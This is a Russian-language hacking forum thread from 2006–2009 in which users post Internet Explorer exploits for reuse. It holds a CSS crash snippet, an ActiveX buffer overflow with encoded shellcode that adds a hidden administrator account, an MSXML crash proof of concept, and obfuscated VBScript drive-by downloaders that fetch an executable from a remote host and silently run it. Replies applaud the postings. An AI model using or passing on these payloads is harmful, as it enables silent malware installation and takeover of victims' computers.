Друзья: Всё для вебмастера | [ Реклама на форуме ] |
0
[ Internet Explorer ]
Автор
Denis---Player
, 10 Dec 2006 19:32
#1
Отправлено 10 December 2006 - 19:32
Программа: Internet Explorer
Удаленный нападающий может вызвать отказ в обслуживании.
Эксплоит:
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>
Удаленный нападающий может вызвать отказ в обслуживании.
Эксплоит:
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>
#2
Отправлено 25 December 2006 - 21:02
Цитата
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>
Классная фиговина, за что и получил +1...Побольше бы таких людей, которые будут выкладывать что лиюо подобное.
РЕСПЕКТ
#4
Отправлено 27 May 2007 - 20:42
IE 6 / Ademco, co., ltd. ATNBaseLoader100 Module ATNBaseLoader100.dll (5, 4, 0, 6)
remote buffer overflow exploit / XP SP2 it version
При успешной эксплуатации создает нового пользователя и помещает его в группу администраторов.
remote buffer overflow exploit / XP SP2 it version
При успешной эксплуатации создает нового пользователя и помещает его в группу администраторов.
<HTML> <OBJECT CLASSID='clsid:4C1AB3D8-8107-4BC8-AEEE-38ECF8A94A12' ID='BaseRunner' ></OBJECT> <script language='vbscript'> 'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add SCODE = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49 %37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50 %30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42 %41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47 %70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43 %31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38 %6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d %49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55 %51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b %55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62 %6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46 %61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31 %74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43 %70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68 %6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62 %48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d %53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41 %78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30 %6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31 %30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32 %54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57 %56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73 %51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65 %34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42 %54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32 %41%61%74%71%74%35%50%44") + NOP NOP= String(12, unescape("%90")) EIP= unescape("%03%78%41%7e") 'call ESP user32.dll SunTzu=String(272, "A") + EIP + NOP + SCODE BaseRunner.Send485CMD SunTzu </script> </HTML>
#5
Отправлено 15 September 2007 - 13:27
Цель: Internet Explorer 6
Воздействие: Отказ в обслуживании
Код эксплоита:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки при обработке входных данных в Microsoft XML Core Services. Удаленный пользователь может помощью специально сформированного Web сайта или email сообщения выполнить произвольный код на целевой системе.
URL производителя: www.microsoft.com
Решение: Установите последнюю версию с сайта производителя.
Воздействие: Отказ в обслуживании
Код эксплоита:
<html> <body> <script language="javascript"> var xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); xmlDoc.loadXML("<dummy></dummy>"); var txt = xmlDoc.createTextNode("huh"); var out = txt.substringData(1,0x7fffffff); </script> </body> </html>Описание уязвимости:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
Уязвимость существует из-за ошибки при обработке входных данных в Microsoft XML Core Services. Удаленный пользователь может помощью специально сформированного Web сайта или email сообщения выполнить произвольный код на целевой системе.
URL производителя: www.microsoft.com
Решение: Установите последнюю версию с сайта производителя.
#7
Отправлено 15 September 2007 - 20:23
FreeCat
Возможно, а возможно и нет ;)
Возможно, а возможно и нет ;)
#8
Отправлено 12 November 2007 - 16:59
IE 6 Exploit.
<script language="VBScript"> On Error Resume Next exe="http://www.[Your Patch Link ].com" x1="o"&"bj"&"e"&"ct" x2="cls"&"id:BD9"&"6C5"&"56-6"&"5"&"A3-1"&"1D"&"0-98"&"3"&"A-00"&"C0"&"4F"&"C2"&"9E36" x3="c"&"la"&"ss"&"id" x4="Mic"&"roso"&"ft.XM"&"LHT"&"TP" x5="Ad"&"od"&"b.St"&"r"&"eam" x6="G"&"ET" x7="Scr"&"ip"&"ting.Fil"&"eS"&"yst"&"emO"&"bject" x8="She"&"ll.A"&"ppl"&"icati"&"on" Set zhu3 = document.createElement(x1) zhu3.SetAttribute x3, x2 XMLHTTP=x4 Set x = zhu3.CreateObject(XMLHTTP,"") D5=x5 D6=D5 Set S = zhu3.CreateObject(D6,"") S.type = 1 zhu32="GET" x.Open zhu32, exe, False x.Send fname1="google.pif" Set F = zhu3.CreateObject("Scripting.FileSystemObject","") Set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close Set Q = zhu3.CreateObject("Shell.Application","") Q.ShellExecute fname1,"","","open",0 </script> <script type="text/jscript">function init() { document.write("");}window.onload = init;</script> <body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
#9
Отправлено 15 February 2008 - 20:21
IE7 Exploit
<html> <head> <title>ProLogic.ws</title> </head> <body> <script type="text/vbscript"> on error resume next Set df = document.createElement("object") df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36" str="Microsoft"&"."&"XMLHTTP" Set x = df.CreateObject(str,"") var1="Ad" var2="od" var3="b." var4="St" var5="re" var6="am" str1=var1&var2&var3&var4&var5&var6 str5=str1 set S = df.createobject(str5,"") for count = 0 to 4 S.type = 1 lnk="www.zf4.com.exe" x.Open "G"&"E"&"T",lnk,0 x.Send set F = df.createobject("Script"&"ing.FileSys"&"temObject","") if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if fname1= F.BuildPath(tmp,"\svacm.exe") S.open S.write x.responseBody S.savetofile fname1,2 S.close if err.number = 0 then set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"INSTALL","","open",0 exit for else Err.Clear End if next </script> </body> </html>
#10
Отправлено 03 May 2008 - 14:00
IE7 Exploit
<html> <head> <title>ProLogic.ws</title> </head> <body> <script type="text/vbscript"> on error resume next Set df = document.createElement("object") df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36" str="Microsoft"&"."&"XMLHTTP" Set x = df.CreateObject(str,"") var1="Ad" var2="od" var3="b." var4="St" var5="re" var6="am" str1=var1&var2&var3&var4&var5&var6 str5=str1 set S = df.createobject(str5,"") for count = 0 to 4 S.type = 1 lnk="www.zf4.com.exe" x.Open "G"&"E"&"T",lnk,0 x.Send set F = df.createobject("Script"&"ing.FileSys"&"temObject","") if count = 0 then tmp = "c:\windows\temp" else if count = 1 then tmp = "c:\" else if count = 2 then tmp = "c:\temp" else if count = 3 then tmp = "d:\windows\temp" else if count = 4 then tmp = "d:\" end if fname1= F.BuildPath(tmp,"\svacm.exe") S.open S.write x.responseBody S.savetofile fname1,2 S.close if err.number = 0 then set Q = df.createobject("Shell.Application","") Q.ShellExecute fname1,"INSTALL","","open",0 exit for else Err.Clear End if next </script> </body> </html>
это всё под IE6.
#12
Отправлено 07 May 2008 - 09:24
Denis---Player (10.12.2006, 19:32) писал:
Программа: Internet Explorer
Удаленный нападающий может вызвать отказ в обслуживании.
Эксплоит:
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>
Удаленный нападающий может вызвать отказ в обслуживании.
Эксплоит:
<div id="foo" style="height: 20px; border: 1px solid blue">
<table style="border: 1px solid red; width:
expression(document.getElementById('foo').offsetWidth+'px');">
<tr><td></td></tr>
</table>
</div>
+1 кул респект)
#13
Отправлено 16 December 2008 - 15:59
MS Internet Explorer XML Parsing Remote Buffer Overflow Exploit 0day
MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
Тот же самый эксплойт, только под висту ;)
MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)
MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
Тот же самый эксплойт, только под висту ;)
MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)
#14
Отправлено 19 February 2009 - 22:38
#16
Отправлено 20 April 2009 - 20:55
Ссылки из под хайдов не выдаю!
#18
Отправлено 10 August 2009 - 19:56
Уязвимость MS Internet Explorer 8.0.7100.0
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных при обработке HTML страниц. Атакующий может обманным образом заманить пользователя на специально составленный сайт, что приведет к отказу системы в обслуживании.
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных при обработке HTML страниц. Атакующий может обманным образом заманить пользователя на специально составленный сайт, что приведет к отказу системы в обслуживании.
Ссылки из под хайдов не выдаю!
Количество пользователей, читающих эту тему: 0
0 пользователей, 0 гостей, 0 анонимных